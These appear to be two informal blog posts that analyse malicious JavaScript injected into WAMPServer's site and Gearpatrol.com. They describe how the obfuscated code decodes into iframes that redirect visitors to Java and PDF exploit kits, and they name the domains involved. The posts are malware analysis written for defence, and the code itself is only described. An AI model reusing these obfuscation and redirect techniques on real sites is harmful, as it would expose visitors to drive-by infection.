WAMP Server Site has Injected JS

Overview
WAMP is an all-in-one package that installs Apache, MySql, and PHP on a windows system. It's the lazy man's way of getting a web-server up and running in almost no time. However, I discovered today that they have injected javascript in their page that redirects users to exploits.

WAMP
WAMP's main page. Doesn't look suspicious on the outside.

Once you check their code, it is immediately apparent there is injected script at the bottom of the page.

It's the typical exploit pack injected code of course. All it really does is take the body of 'jibberish', remove the 'a' characters and replace them with commas. Then it multiplies all the numbers by 2 which gives you an array of whole numbers to which it String.fromCharCode()s into normal javascript. It throws in a bunch of other stuff just to make de-obfuscating a little harder. Or to make it look more legit? Pastebin for the full injected code is here

Deobfuscated

Of course that Iframe redirects me to some more bad code.  Here's the pastebin for this code

Deobfuscated. Another layer of obfuscation. But it's just the Dean Edwards JS packer, so no big deal.

Layer 2 deobfuscated. Heyoo PDF version enumeration

That isn't the only query that the redirect generated. It also generated a query to some obfuscated code that enumerates the system's Java version Here is the pastebin for this code

Same type of obfuscation.

I haven't notified WAMPServer.com that their site is owned yet because I'm lazy. But this just goes to show that you can never tell what sites will get owned next. So keep your Flash, PDF, Java, and browsers up-to-date all the time.

Some domain information. This reminded me a lot of a SANs blog post I read about how these malware rings alter domain information for actual legit domains in order to capitalize on SEO and other things. Maybe I'm wrong.

A quick google search on some of this information and I found at least a couple more domains that have the injected code as well, ie: marijuanapictures.com  

There are probably dozens/hundreds/etc.. of domains that got blasted and now have injected redirects.
 

Gear Patrol site redirecting to malware

Gearpatrol.com , the "definitive men's resource site", had an owned javascript file linked on their main page that was redirecting users to java exploits/malware the other day. I'll show you.

The owned JS File

If you would have gone to Gearpatrol.com the other day, on their main page is a link to a JS file that you won't notice has loaded.

"The definitive men's resource"  - haha

Gearpatrol.com loads up when all of a sudden shit starts going wrong. Then you think, "What in the hell...?"


Some weird Jquery.js file is sourced in the main page that is set to load

Here is what the request/response looks like. You can see the code served by gearpatrol.com is awkward looking but doesn't look definitively malicious at first site.

Jquery javascript files always look rather fucked to me, but this one in particular looked especially strange. So I decided to determine what it was doing. I statically assigned two JS properties that were being called since Malzilla can't handle them. I changed "navigator.platform" aka operating system, and "navigator.useragent" aka web browser. After these two changes, the script simply compiled and told me exactly what it was doing, thankfully.

In the bottom pane you can see the iframe the javascript file was injecting into Gearpatrol.com's main page. Let's see where that iframe takes us.

Ahh that first redirect was most likely for statistic purposes. We then get bounced off to a risque site, teenporntubeonly.com . But we won't find porn there. Instead we find obfuscated javascript using typical techniques. It just multiplies the number by the variable 'g', then performs String.fromCharCode on each product. In the lower-pane are the results after de-obfuscating the code.

And once it's formatted you can tell it's serving various Java exploits which no doubt drop various malware. These were your typical Java exploits, nothing special, but it goes to show how you can get snagged from nearly any site these days, ESPECIALLY if you have outdated Java, Adobe anything, or web browser.

There's nothing amazing going on here. This happens to a lot of sites, and some are faster than others at removing them (this one appears to be fixed on Gearpatrol.com). Really the main thing you can do to prevent any issues is to keep your software updated and hope the malware people don't utilize 0-days or very new exploits.